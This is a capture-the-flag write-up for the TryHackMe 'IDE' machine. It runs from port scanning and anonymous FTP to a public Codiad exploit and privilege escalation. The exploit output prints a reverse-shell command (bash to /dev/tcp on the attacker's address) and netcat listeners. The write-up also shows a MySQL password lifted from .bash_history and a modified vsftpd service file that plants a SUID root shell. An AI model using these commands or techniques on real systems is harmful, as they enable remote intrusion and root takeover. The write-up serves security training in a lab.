IDE (Codiad, Service)
Firstly, we need to enumerate using rustscan.
╭─hnl@hnl ~/Desktop/ctf/tryhackme/ide
╰─➤ rustscan -a 10.10.149.33 | tee rust.log
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
🌍HACK THE PLANET🌍
[~] The config file is expected to be at "/home/hnl/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.10.149.33:21
Open 10.10.149.33:22
Open 10.10.149.33:80
Open 10.10.149.33:62337
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
[~] Starting Nmap 7.80 ( https://nmap.org ) at 2022-04-24 02:05 +0630
Initiating Ping Scan at 02:05
Scanning 10.10.149.33 [2 ports]
Completed Ping Scan at 02:05, 0.24s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 02:05
Completed Parallel DNS resolution of 1 host. at 02:05, 0.68s elapsed
DNS resolution of 1 IPs took 0.68s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 02:05
Scanning 10.10.149.33 [4 ports]
Discovered open port 80/tcp on 10.10.149.33
Discovered open port 21/tcp on 10.10.149.33
Discovered open port 22/tcp on 10.10.149.33
Discovered open port 62337/tcp on 10.10.149.33
Completed Connect Scan at 02:05, 0.31s elapsed (4 total ports)
Nmap scan report for 10.10.149.33
Host is up, received syn-ack (0.27s latency).
Scanned at 2022-04-24 02:05:13 +0630 for 1s
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack
22/tcp open ssh syn-ack
80/tcp open http syn-ack
62337/tcp open unknown syn-ack
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 1.27 secondsPort 21
Connect to FTP and Download interesting file.
╭─hnl@hnl ~/Desktop/ctf/tryhackme/ide
╰─➤ ftp 10.10.149.33
Connected to 10.10.149.33.
220 (vsFTPd 3.0.3)
Name (10.10.149.33:hnl): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls -al
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 3 0 114 4096 Jun 18 2021 .
drwxr-xr-x 3 0 114 4096 Jun 18 2021 ..
drwxr-xr-x 2 0 0 4096 Jun 18 2021 ...
226 Directory send OK.
ftp> pwd
257 "/" is the current directory
ftp> cd ...
250 Directory successfully changed.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 151 Jun 18 2021 -
226 Directory send OK.
ftp> get -
local: ./- remote: -
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for - (151 bytes).
226 Transfer complete.
151 bytes received in 0.00 secs (488.2812 kB/s)Change the file name and read the file.
╭─hnl@hnl ~/Desktop/ctf/tryhackme/ide
╰─➤ mv - file.txt
╭─hnl@hnl ~/Desktop/ctf/tryhackme/ide
╰─➤ cat file.txt
Hey john,
I have reset the password as you have asked. Please use the default password to login.
Also, please take care of the image file ;)
- drac.Port 80
You will see default apache webpage at http://10.10.149.33/.
Enumerate sub directory using gobuster. (Nothing interesting)
Port 62337
In http://10.10.149.33:62337/, you will find a webpage called Codiad 2.8.4.
Here is the public exploit https://www.exploit-db.com/raw/49705. We successfully login using john:password
╭─hnl@hnl ~/Desktop/ctf/tryhackme/ide
╰─➤ python3 exp.py http://10.10.149.33:62337/ john password 10.9.0.3 4444 linux
[+] Please execute the following command on your vps:
echo 'bash -c "bash -i >/dev/tcp/10.9.0.3/4445 0>&1 2>&1"' | nc -lnvp 4444
nc -lnvp 4445
[+] Please confirm that you have done the two command above [y/n]
[Y/n] y
[+] Starting...
[+] Login Content : {"status":"success","data":{"username":"john"}}
[+] Login success!
[+] Getting writeable path...
[+] Path Content : {"status":"success","data":{"name":"CloudCall","path":"\/var\/www\/html\/codiad_projects"}}
[+] Writeable Path : /var/www/html/codiad_projects
[+] Sending payload...In netcat session, we got a reverse shell.
User
Got Permission denied when we read user.txt
We found mysql credentials in .bash_history.
www-data@ide:/home/drac$ cat .bash_history
cat .bash_history
mysql -u drac -p 'Th3dRaCULa1sR3aL'
www-data@ide:/home/drac$ Connect ssh using this credentials.
Root
Check the privileges.
drac@ide:~$ sudo -l
[sudo] password for drac:
Matching Defaults entries for drac on ide:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User drac may run the following commands on ide:
(ALL : ALL) /usr/sbin/service vsftpd restartFind vsftpd service file.
drac@ide:~$ find / -type f -name vsftpd.service 2>/dev/null
/lib/systemd/system/vsftpd.service
/var/lib/systemd/deb-systemd-helper-enabled/multi-user.target.wants/vsftpd.serviceCheck service file permission. We can modify it.
drac@ide:~$ ls -al /lib/systemd/system/vsftpd.service
-rw-rw-r-- 1 root drac 248 Aug 4 2021 /lib/systemd/system/vsftpd.serviceWe can modify it like that.
[Unit]
Description=vsftpd FTP server
After=network.target
[Service]
Type=simple
ExecStart=/bin/bash -c 'cp /bin/bash /tmp/shell;chmod +xs /tmp/shell'
#ExecReload=/bin/kill -HUP $MAINPID
#ExecStartPre=-/bin/mkdir -p /var/run/vsftpd/empty
[Install]
WantedBy=multi-user.targetRestart FTP service with Root Privileges.
drac@ide:~$ sudo /usr/sbin/service vsftpd restartExecute the bash.
drac@ide:~$ /tmp/shell -p
shell-4.4# whoami
root
shell-4.4# Last updated
Was this helpful?